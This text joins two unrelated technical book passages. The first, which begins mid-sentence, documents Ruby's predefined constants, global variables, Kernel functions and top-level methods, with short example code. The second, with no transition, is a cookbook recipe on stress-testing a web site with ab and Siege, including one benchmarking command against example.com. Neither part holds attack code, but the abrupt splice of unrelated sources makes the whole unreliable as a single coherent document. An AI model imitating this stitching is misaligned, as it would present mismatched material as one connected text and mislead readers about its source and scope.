virtual concatenation of files named in ARGV,
or to standard input if ARGV is empty. A
synonym for $<.
ARGV: An array containing the arguments specified on the command line. A
synonym for $*.
DATA: If your program file includes the token
__END__ on a line by itself, then this constant
is defined to be a stream that allows access to the lines of the
file following __END__. If the program file
does not include __END__, then this constant is
not defined.
ENV: An object that behaves like a hash and provides access
to the environment variable settings in effect for the
interpreter.
FALSE: A deprecated synonym for false.
NIL: A deprecated synonym for nil.
RUBY_PATCHLEVEL: An integer indicating the patchlevel for the interpreter.
RUBY_PLATFORM: A string indicating the platform of the Ruby interpreter.
RUBY_RELEASE_DATE: A string indicating the release date of the Ruby interpreter.
RUBY_VERSION: A string indicating the version of the Ruby language supported by the
interpreter.
STDERR: The standard error output stream. This is the default
value of the $stderr variable.
STDIN: The standard input stream. This is the default value of the
$stdin variable.
STDOUT: The standard output stream. This is the default value of the
$stdout variable.
TOPLEVEL_BINDING: A Binding object representing the
bindings in the top-level scope.
TRUE: A deprecated synonym for true.
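To illustrate the :: prefix described above, here is a minimal sketch in which a hypothetical AppConfig module (the name and its hash contents are made up for the example) shadows the top-level ENV constant. It then reaches the real ENV object explicitly.

```ruby
# Hypothetical module that defines its own ENV constant,
# shadowing the top-level ENV inside the module body.
module AppConfig
  ENV = { "APP_MODE" => "test" }

  # An unqualified reference finds AppConfig::ENV first.
  def self.local_env
    ENV
  end

  # The :: prefix names the top-level constant explicitly.
  def self.process_env
    ::ENV
  end
end

puts AppConfig.local_env.class                    # Hash
puts AppConfig.process_env.equal?(Object::ENV)    # true
```

Note that the top-level ENV only behaves like a hash; it is not itself a Hash instance.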

10.2.3. Global Variables

The Ruby interpreter predefines a number of global variables that your
programs can use. Many of these variables are special in some way. Some
use punctuation characters in their names. (The
English.rb module defines English-language
alternatives to the punctuation. Add require 'English' to your program if you want to use these verbose
alternatives.) Some are read-only and may not be assigned to. And some
are thread-local, so that each thread of a Ruby program may see a
different value of the variable. Finally, some global variables
($_, $~, and the pattern-matching
variables derived from it) are method-local: although the variable is
globally accessible, its value is local to the current method. If a
method sets the value of one of these magic globals, it does not alter
the value seen by the code that invokes that method.
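The method-local behavior of $~ can be seen in a short sketch. The method name inner_match is hypothetical. A match performed inside a method does not disturb the caller's match data.

```ruby
# A method that performs its own pattern match.
def inner_match
  "hello world" =~ /world/
  $~[0]              # this method's own match data
end

"foo bar" =~ /foo/   # sets $~ for the top-level scope
inner = inner_match
outer = $~[0]        # unaffected by the match inside inner_match

puts inner   # world
puts outer   # foo
```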

You can obtain the complete list of global variables predefined by
your Ruby interpreter with:

ruby -e 'puts global_variables.sort'

To include the verbose names from the English
module in your listing, try:

ruby -rEnglish -e 'puts global_variables.sort'

The subsections that follow document the predefined global
variables by category.

10.2.3.1. Global settings

These global variables hold configuration settings and specify
information, such as command-line arguments, about the environment in
which the Ruby program is running:

$*: A read-only synonym for the ARGV
constant. English synonym: $ARGV.
$$: The process ID of the current Ruby process. Read-only.
English synonyms: $PID,
$PROCESS_ID.
$?: The exit status of the last process terminated.
Read-only and thread-local. English synonym:
$CHILD_STATUS.
$DEBUG, $-d: Set to true if the
-d or --debug options were
set on the command line.
$KCODE, $-K: In Ruby 1.8, this variable holds a string that names the
current text encoding. Its value is "NONE", "UTF8", "SJIS", or
"EUC". This value can be set with the interpreter option
-K. This variable no longer works in Ruby 1.9,
and using it causes a warning.
$LOADED_FEATURES, $": An array of strings naming the files that have been
loaded. Read-only.
$LOAD_PATH, $:, $-I: An array of strings holding the directories to be searched
when loading files with the load and
require methods. This variable is read-only,
but you can alter the contents of the array to which it refers,
appending or prepending new directories to the path, for
example.
$PROGRAM_NAME, $0: The name of the file that holds the Ruby program currently
being executed. The value will be "-" if the
program is read from standard input, or "-e"
if the program was specified with a -e
option. Note that this is different from
$FILENAME.
$SAFE: The current safe level for program execution. See Section 10.5
for details. This variable may be set from the command line with
the -T option. The value of this variable is
thread-local.
$VERBOSE, $-v, $-w: True if the -v, -w,
or --verbose command-line option is
specified. nil if -W0 was
specified. false otherwise. You can set this
variable to nil to suppress all
warnings.
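A few of these settings in action, as a minimal sketch. The helper name without_warnings and the directory /opt/myapp/lib are hypothetical. The sketch suppresses warnings for one block by setting $VERBOSE to nil, extends the array that $LOAD_PATH refers to, and compares $$ with Process.pid.

```ruby
# Run a block with all warnings suppressed by setting $VERBOSE to nil,
# restoring the previous setting afterwards (hypothetical helper).
def without_warnings
  saved = $VERBOSE
  $VERBOSE = nil
  yield
ensure
  $VERBOSE = saved
end

# $LOAD_PATH itself is read-only, but the array it refers to can be
# modified. The directory name here is hypothetical.
$LOAD_PATH.unshift("/opt/myapp/lib")

puts $$ == Process.pid                       # true
puts without_warnings { $VERBOSE.inspect }   # nil
```

The ensure clause restores the old $VERBOSE value even if the block raises an exception.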

10.2.3.2. Exception-handling globals

The following two global variables are useful in
rescue clauses when an exception has been
raised:

$!: The last exception object raised. The exception
object can also be accessed using the =>
syntax in the declaration of the rescue
clause. The value of this variable is thread-local. English
synonym: $ERROR_INFO.
$@: The stack trace of the last exception, equivalent to
$!.backtrace. This value is thread-local.
English synonym: $ERROR_POSITION.
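Here is a minimal sketch of both globals inside a rescue clause, using a hypothetical parse_or_report method. $! is the same object bound with =>, and $@ is its backtrace.

```ruby
# Parse a string as an integer; on failure, report what the
# exception-handling globals hold instead of re-raising.
def parse_or_report(text)
  Integer(text)
rescue ArgumentError => e
  {
    same_object:  e.equal?($!),          # $! is the exception just rescued
    backtrace_ok: $@ == $!.backtrace,    # $@ is shorthand for $!.backtrace
    message:      $!.message
  }
end

p parse_or_report("42")                        # 42
p parse_or_report("forty-two")[:same_object]   # true
```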

10.2.3.3. Streams and text-processing globals

The following globals are IO streams and variables that
affect the default behavior of text-processing
Kernel methods. You'll find examples of their use
in Section 10.3:

$_: The last string read by the Kernel
methods gets and readline.
This value is thread-local and method-local. A number of
Kernel methods operate implicitly on
$_. English synonym:
$LAST_READ_LINE.
$<: A read-only synonym for the ARGF
stream: an IO-like object providing access to
a virtual concatenation of the files specified on the
command-line, or to standard input if no files were specified.
Kernel read methods, such as
gets, read from this stream. Note that this
stream is not always the same as $stdin.
English synonym: $DEFAULT_INPUT.
$stdin: The standard input stream. The initial value of this
variable is the constant STDIN. Many Ruby
programs read from ARGF or
$< instead of
$stdin.
$stdout, $>: The standard output stream, and the destination of the
printing methods of Kernel: puts,
print, printf, etc.
English synonym: $DEFAULT_OUTPUT.
$stderr: The standard error output stream. The initial value of this variable
is the constant STDERR.
$FILENAME: The name of the file currently being read from
ARGF. Equivalent to
ARGF.filename. Read-only.
$.: The number of the last line read from the current input file.
Equivalent to ARGF.lineno. English synonyms:
$NR,
$INPUT_LINE_NUMBER.
$/, $-0: The input record separator (newline by default).
gets and readline use this
value by default to determine line boundaries. You can set this
value with the -0 interpreter option. English
synonyms: $RS,
$INPUT_RECORD_SEPARATOR.
$\: The output record separator. The default value is
nil, but is set to $/ when
the interpreter option -l is used. If
non-nil, the output record separator is
output after every call to print (but not
puts or other output methods). English
synonyms: $ORS,
$OUTPUT_RECORD_SEPARATOR.
$,: The separator output between the arguments to
print and the default separator for
Array.join. The default is
nil. English synonyms:
$OFS, $OUTPUT_FIELD_SEPARATOR.
$;, $-F: The default field separator used by split. The
default is nil, but you can specify a value
with the interpreter option -F. English
synonyms: $FS,
$FIELD_SEPARATOR.
$F: This variable is defined if the Ruby interpreter is invoked with
the -a option and either
-n or -p. It holds the
fields of the current input line, as returned by
split.
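Because the Kernel printing methods write to whatever object $stdout currently refers to, reassigning it is a common way to capture output. This minimal sketch uses a hypothetical capture_stdout helper and a StringIO from the standard library.

```ruby
require 'stringio'

# Capture everything written by Kernel#puts and Kernel#print,
# which write to whatever object $stdout currently refers to.
def capture_stdout
  saved = $stdout
  $stdout = StringIO.new
  yield
  $stdout.string
ensure
  $stdout = saved    # the STDOUT constant itself is never changed
end

captured = capture_stdout do
  puts "hello"
  print "a", "b"     # $, is nil by default, so nothing goes between the args
end
p captured           # "hello\nab"
```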

10.2.3.4. Pattern-matching globals

The following globals are thread-local and method-local and are
set by any Regexp pattern-matching
operation:

$~: The MatchData object produced by
the last pattern matching operation. This value is thread-local
and method-local. The other pattern-matching globals described
here are derived from this one. Setting this variable to a new
MatchData object alters the value of the
other variables. English synonym:
$MATCH_INFO.
$&: The most recently matched text. Equivalent to
$~[0]. Read-only, thread-local, method-local,
and derived from $~. English synonym:
$MATCH.
$`: The string preceding the match in the last pattern match. Equivalent to
$~.pre_match. Read-only, thread-local,
method-local, and derived from $~. English
synonym: $PREMATCH.
$': The string following the match in the last pattern match.
Equivalent to $~.post_match. Read-only,
thread-local, method-local, and derived from
$~. English synonym:
$POSTMATCH.
$+: The string corresponding to the last successfully matched
group in the last pattern match. Read-only, thread-local,
method-local, and derived from $~. English
synonym:
$LAST_PAREN_MATCH.
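The pattern-matching globals can be compared side by side after a single match. The method name dissect and the sample string are hypothetical. Requiring English also provides verbose aliases such as $PREMATCH.

```ruby
require 'English'   # adds verbose aliases such as $PREMATCH

# Return the pattern-matching globals set by one =~ match.
def dissect(text)
  return nil unless text =~ /(\w+) (\w+)/
  {
    match:       $&,          # same as $~[0]
    pre:         $`,          # same as $~.pre_match
    post:        $',          # same as $~.post_match
    last_group:  $+,          # last successfully matched group
    first_group: $~[1],
    pre_english: $PREMATCH    # English alias for $`
  }
end

p dissect("name: John Smith!")
```

For "name: John Smith!" the match is "John Smith". $` is "name: ", $' is "!", and $+ is "Smith".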

10.2.3.5. Command-line option globals

Ruby defines a number of global variables that correspond to the
state or value of interpreter command-line options. The variables
$-0, $-F,
$-I, $-K,
$-d, $-v, and
$-w have synonyms and are included in the previous
sections:

$-a: true if the interpreter option
-a was specified; false
otherwise. Read-only.
$-i: nil if the interpreter option
-i was not specified. Otherwise, this
variable is set to the backup file extension specified with
-i.
$-l: true if the -l
option was specified. Read-only.
$-p: true if the interpreter option
-p was specified; false
otherwise. Read-only.
$-W: In Ruby 1.9, this global variable specifies the current
verbose level. It is 0 if the -W0 option was used, and is
2 if any of the options
-w, -v, or
--verbose were used. Otherwise, this variable
is 1. Read-only.

10.2.4. Predefined Global Functions

The Kernel module, which is included by
Object, defines a number of private instance methods
that serve as global functions. Because they are private, they must be
invoked functionally, without an explicit receiver object. And because
they are included by Object, they can be invoked
anywhere—no matter what the value of self is, it will
be an object, and these methods can be implicitly invoked on it. The
functions defined by Kernel can be grouped into
several categories, most of which are covered elsewhere in this chapter
or elsewhere in this book.
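The privacy of these functions can be checked directly. This minimal sketch uses puts as the example. It shows that the method is a private instance method of Kernel, that Object includes Kernel, and that calling it with an explicit receiver fails.

```ruby
# Kernel functions such as puts are private instance methods,
# and Object includes Kernel, so every object inherits them.
puts Kernel.private_method_defined?(:puts)   # true
puts Object.include?(Kernel)                 # true

begin
  "some string".puts("hi")   # explicit receiver: not allowed for a private method
rescue NoMethodError => e
  puts "NoMethodError: #{e.message}"
end
```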

10.2.4.1. Keyword functions

The following Kernel functions behave like
language keywords and are documented elsewhere in this book:

block_given?    iterator?       loop            require
callcc          lambda          proc            throw
catch           load            raise

10.2.4.2. Text input, output, and manipulation functions

Kernel defines the following functions, most
of which are global variants of IO methods. They
are covered in more detail in Section 10.3:

format          print           puts            sprintf
gets            printf          readline
p               putc            readlines

In Ruby 1.8 (but not 1.9), Kernel also
defines the following global variants of String
methods that operate implicitly on $_:

chomp   chop    gsub    scan    sub
chomp!  chop!   gsub!   split   sub!

10.2.4.3. OS methods

The following Kernel functions allow a Ruby
program to interface with the operating system. They are
platform-dependent and are covered in Section 10.4. Note that
` is the specially named backtick method that
returns the text output by an arbitrary OS shell command:

`       fork    select  system  trap
exec    open    syscall test
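As a platform-dependent illustration, here is a sketch that assumes a POSIX system with echo and sh available. It runs one command through the backtick method and one through system, and inspects the $? global after each.

```ruby
# Assumes a POSIX system with echo and sh available.
output = `echo hello`   # the backtick method returns the command's stdout
puts output.inspect     # "hello\n"
puts $?.success?        # true: $? holds the Process::Status just set

ok = system("sh", "-c", "exit 3")   # multi-argument form runs sh directly
puts ok                             # false (nonzero exit status)
puts $?.exitstatus                  # 3
```

system returns true or false according to the exit status, or nil if the command could not be run at all.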

10.2.4.4. Warnings, failures, and exiting

The following Kernel functions display
warnings, raise exceptions, cause the program to exit, or register
blocks of code to be run when the program terminates. They are
documented along with OS-specific methods in Section 10.4:

abort   at_exit exit    exit!   fail    warn

10.2.4.5. Reflection functions

The following Kernel functions are part of
Ruby's reflection API and were described in Chapter 8:

binding                         set_trace_func
caller                          singleton_method_added
eval                            singleton_method_removed
global_variables                singleton_method_undefined
local_variables                 trace_var
method_missing                  untrace_var
remove_instance_variable
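As a small taste of the reflection functions, trace_var can record assignments to a global. In this minimal sketch, the global $counter and the TRACE_LOG constant are hypothetical names used only for illustration.

```ruby
# Record every value assigned to a hypothetical global, $counter.
TRACE_LOG = []
trace_var(:$counter) { |value| TRACE_LOG << value }

$counter = 1
$counter = 2
untrace_var(:$counter)   # with no command given, removes all traces
$counter = 3             # no longer recorded

p TRACE_LOG                               # [1, 2]
p global_variables.include?(:$counter)    # true
```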

10.2.4.6. Conversion functions

The following Kernel functions attempt to
convert their arguments to a new type. They were described in Section 3.8.7.3:

Array   Float   Integer String
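A quick sketch of these conversion functions. Note that Integer and Float raise ArgumentError for unparseable strings, whereas methods like String#to_i quietly return 0.

```ruby
p Integer("42")      # 42
p Integer("0x1A")    # 26 (radix prefixes are honored)
p Float("3.5")       # 3.5
p String(42)         # "42"
p Array(nil)         # []
p Array([1, 2])      # [1, 2]
p Array(1..3)        # [1, 2, 3]
p "abc".to_i         # 0

begin
  Integer("abc")
rescue ArgumentError => e
  puts "ArgumentError: #{e.message}"
end
```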

10.2.4.7. Miscellaneous Kernel functions

The following miscellaneous Kernel functions
don't fit into the previous categories:

autoload                rand                    srand
autoload?               sleep

rand and srand are for
generating random numbers, and are documented in Section 9.3.7. autoload and
autoload? are covered in Section 7.6.3. And sleep is covered in
Section 9.9 and Section 10.4.4.
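A minimal sketch of how srand and rand relate: reseeding with the same value reproduces the same pseudorandom sequence. The seed value 1234 is arbitrary.

```ruby
# Seeding with the same value reproduces the same pseudorandom sequence.
srand(1234)
first = Array.new(3) { rand(100) }    # integers in 0...100

srand(1234)
second = Array.new(3) { rand(100) }

p first == second                          # true
p first.all? { |n| (0...100).cover?(n) }   # true
p rand.between?(0.0, 1.0)   # rand with no argument returns a Float in [0.0, 1.0)
```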

10.2.5. User-Defined Global Functions

When you define a method with def inside a
class or module declaration and do
not specify a receiver object for the method, the method is created as a
public instance method of self, where
self is the class or module you are defining. Using
def at the top level, outside of any
class or module, is different in
two important ways. First, top-level methods are instance methods of
Object (even though self is not
Object). Second, top-level methods are always
private.
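Both points can be checked in a short sketch with a hypothetical shout method, assuming the code is run as a script file. The method ends up as a private instance method of Object. It works when called functionally, but fails with an explicit receiver.

```ruby
# A top-level method: it becomes a private instance method of Object.
def shout(text)
  text.upcase + "!"
end

puts Object.private_method_defined?(:shout)   # true
puts shout("hi")                              # HI! (called without a receiver)

begin
  "anything".shout("hi")   # explicit receiver: private method, so this fails
rescue NoMethodError => e
  puts "NoMethodError: #{e.message}"
end
```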

Top-Level self: the Main Object

Because top-level methods become instance methods of
Object, you might expect that the value of
self would be Object. In fact,
however, top-level methods are a special case: methods are defined in
Object, but self is a different
object. This special top-level object is known as the "main" object,
and there is not much to say about it. The class of the
main object is Object, and it
has a singleton to_s method that returns the string
"main".

The fact that top-level methods are defined in
Object means that they are inherited by all objects
(including Module and Class) and
(if not overridden) can be used within any class or instance method
definition. (You can review Ruby's method name resolution algorithm in
Section 7.8 to convince yourself of this.) The fact
that top-level methods are private means that they must be invoked like
functions, without an explicit receiver. In this way, Ruby mimics a
procedural programming paradigm within its strictly object-oriented
framework.
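A minimal sketch of the main object and of top-level method inheritance. The names TOP_SELF, helper, and Report are hypothetical. The same top-level method is called from a class body, where self is the class, and from an instance method, where self is an instance.

```ruby
TOP_SELF = self   # capture the top-level self, the "main" object

# Top-level methods are inherited by every object, classes included.
def helper
  "helper called on #{self.class}"
end

class Report
  CLASS_BODY_RESULT = helper   # self here is the class Report itself

  def run
    helper                     # self here is a Report instance
  end
end

puts TOP_SELF.to_s               # main
puts TOP_SELF.class              # Object
puts Report::CLASS_BODY_RESULT   # helper called on Class
puts Report.new.run              # helper called on Report
```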

Recipe 21.4. Stress Testing Your Web Site

21.4.1. Problem

You want to find out how well your web site performs under a heavy load.

21.4.2. Solution

Use a stress-testing and benchmarking tool to simulate a variety of load levels.

21.4.3. Discussion

Stress testing is frequently confused with benchmarking, and it is important to recognize the difference between the two activities.

Benchmarking a web site is often a somewhat casual activity when performed by an individual developer. The most commonly used tool is the Apache HTTP server benchmarking tool, ab, which is designed to test how many requests per second an HTTP server is capable of serving. For example:

% /usr/bin/ab -n 1000 -c 100 -k www.example.com/test.php

This test would return a report showing the average response time for requests to http://www.example.com/test.php, based on 1,000 requests (-n 1000), with up to 100 requests in flight concurrently (-c 100) and HTTP KeepAlive enabled (-k).

While that sort of test has value (it gives you a reasonable estimate of how many requests you can serve per second under normal load), it doesn't tell you much about how your entire web application will behave under heavy load. It only pounds on one URL at a time, after all.

Stress testing is a technique whose intent is to break your web application. By testing to the breaking point, you can identify and repair weaknesses in your application, or get a better sense of when you will need to add hardware. Combined with code profiling, stress testing can also give you an idea of which part of your application will need to scale first; for example, will you need to add servers to your database cluster before you need more frontend web server machines?

An excellent open source tool for stress testing is Siege. Siege can be configured to read a large number of URLs from a configuration file and run through them in order (regression testing), or it can read a list of URLs and hit them randomly, which better approximates real-world usage of a web site. Siege can also pound on a single URL in a similar fashion to ab.

If you are unable to install Siege on your system, Lincoln Stein's torture.pl script is a good alternative. Many of Siege's design concepts were inspired by torture.pl, and the two tools produce similar reports.

21.4.4. See Also

Source and documentation for Siege at http://www.joedog.org/JoeDog/Siege; ab at http://httpd.apache.org/docs/2.0/programs/ab.html; source and documentation for torture.pl at http://stein.cshl.org/~lstein/torture/.